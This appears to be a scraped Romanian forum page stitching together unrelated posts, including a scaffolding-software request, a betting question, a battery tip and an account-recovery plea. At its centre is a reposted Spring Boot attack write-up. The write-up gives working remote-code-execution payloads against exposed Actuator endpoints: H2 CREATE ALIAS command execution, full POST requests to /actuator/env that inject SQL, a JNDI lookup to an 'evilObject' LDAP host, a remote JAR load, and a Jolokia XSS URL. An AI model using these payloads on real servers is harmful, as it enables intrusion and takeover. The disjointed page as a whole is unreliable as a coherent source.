Leaderboard

Plecand de la elementele ce alcatuiesc o schela metalica ,dimensiunile acestora si a cladirii unde urmeaza sa fie amplasata aceasta schela am nevoie de un soft care sa-mi realizeze desenele tehnice, schema de asamblare si schita schelei metalice in format 2D si 3D. Scopul Software-ul va fi pentru a prezenta proiectul clienților și pentru a face un necesar al materialelor necesare.

Si cum stabilesti membri ? Care sunt criteriile ? Ca sa maresti sansele cu 50% da poti, dar depinde de cota. Cum garantezi ca faci bani cu acest club ? Dezvolta putin, daca nu aici in PM.

Fiind persoana care a incepu conversatia asta sicer cer ca acest topic sa se inchida. Sincer m-am saturat de persoane care cred in conspiratii si idiotenii @Nytro ce naiba ? stiu ca avem dreptul la libera discutie dar peste 70% din raspunderi la acest topic au fost doar pe tema ca statul ne controleaza. Mesaj pentru toti conspirationistii ... sa va manince SRI-ul

https://www.riseproject.ro/articol/spitalul-meu-de-stat/

Spring Boot Vulnerability (to be continued....) 0x01 Spring Boot Actuator Exposed Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example the health endpoint provides basic application health information. The following endpoints are available: /autoconfig - Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied. /beans - Displays a complete list of all the Spring beans in your application. /configprops - Displays a collated list of all @ConfigurationProperties. /dump - Performs a thread dump. /env - Exposes properties from Spring's ConfigurableEnvironment. /health - Shows application health information (a simple 'status' when accessed over an unauthenticated connection or full message details when authenticated). /info - Displays arbitrary application info. /metrics - Shows 'metrics' information for the current application. /mappings - Displays a collated list of all @RequestMapping paths. /shutdown - Allows the application to be gracefully shutdown (not enabled by default). /trace - Displays trace information (by default the last few HTTP requests). 0x02 Spring Boot RCE/XSS involving Jolokia 0x001 Jolokia RCE 0x002 Jolokia XSS fixed since Jolokia 1.5.0 (CVE-2018-1000129) pom.xml <dependency> <groupId>org.jolokia</groupId> <artifactId>jolokia-core</artifactId> <version>1.4.0</version> </dependency> When visiting URL http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html 0x03 Spring Boot RCE involving H2 Database JNDI Injection pom.xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-jpa</artifactId> <version>2.2.6.RELEASE</version> </dependency> <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <scope>runtime</scope> <version>1.4.2</version> </dependency> application.properties spring.h2.console.enabled=true spring.h2.console.settings.web-allow-others=true You can visit /actutor/env to make sure H2 Console is enabled. Sample1: Execute open -a Calculator Command 0x04 Spring Boot RCE involving H2 Database ALIAS Command Sample1: Execute id Command CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$; CALL EXECMD('id') Sample2: Execute open -a Calculator Command CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$; CALL EXECMD('open -a Calculator'); 0x05 Spring Boot RCE involving JMX enabled When visiting URL http://127.0.0.1:10090/actuator/env/spring.jmx.enabled, you will find JMX is enabled. Sample1: Execute open -a Calculator Command 0x06 Spring Boot RCE involving H2 Database 0x001 Remote Code Execution via spring.datasource.hikari.connection-test-query OR spring.datasource.hikari.connection-init-sql Step 1: POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/json Content-Length: 280 {"sourceType": "com.zaxxer.hikari.HikariDataSource","name":"spring.datasource.hikari.connection-init-sql","value":"CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;CALL EXECMD('open -a Calculator');"} STEP 2: POST /actuator/restart HTTP/1.1 0x002 JNDI Injection Step 1: POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 Connection: close Content-Length: 320 { "name": "spring.datasource.hikari.connection-init-sql", "value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception {new InitialContext().lookup(url);return null;}$$;CALL jndi('ldap://127.0.0.1:1389/evilObject');" } STEP 2: POST /actuator/restart HTTP/1.1 0x003 URL Classloader Step 1: POST /actuator/env HTTP/1.1 Host: 127.0.0.1:10090 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Content-Type: application/json Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6 Connection: close Content-Length: 320 { "name": "spring.datasource.hikari.connection-init-sql", "value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$;CALL remoteUrl()" } STEP 2: POST /actuator/restart HTTP/1.1 0x07 Spring Boot RCE involving MyBatis(CVE-2020-26945) Sursa: https://github.com/pyn3rd/Spring-Boot-Vulnerability

Ați încercat să calibrați bateria? Este un proces simplu. Încercați doar ... veți găsi un ghid bun dacă folosiți puțin Google

Nu ma mai pot loga in cont, contul nu a fost sters si in caz de a fost furat sau ceva, am dovada ca contul este al meu